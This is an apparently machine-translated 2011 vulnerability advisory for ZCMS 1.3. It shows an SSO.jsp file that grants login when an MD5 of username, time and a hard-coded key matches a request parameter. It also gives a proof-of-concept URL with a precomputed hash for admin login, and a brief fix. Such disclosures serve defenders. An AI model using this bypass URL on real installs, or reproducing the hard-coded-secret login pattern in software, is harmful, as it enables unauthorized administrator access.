ZCMS 1.3 final background verification bypass vulnerability and solution-vulnerability warning-the black bar safety net

2011-09-01T00:00:00
ID MYHACK58:62201131750
Type myhack58
Reporter 佚名
Modified 2011-09-01T00:00:00

Description

Brief description: SSO. jsp The file is a logic error Detailed description: SSO. a jsp file is a logic error <%

String username = request. getParameter("u");

String time = request. getParameter("t");

String str = request. getParameter("s");

String key = "WIU%&DJAJKL%^W(DLJIST";

String s = StringUtil. md5Hex(username + time + key);

if (s. equals(str)) {

Login. ssoLogin(request, response, username);

}

%> Vulnerability to prove: http://www.zving.com/demo/SSO.jsp?u=admin&t=1&s=ff1168b33fe9e33841bb9814c58a098d Repair solutions: Delete the exploit files

Vulnerability author: tnt1200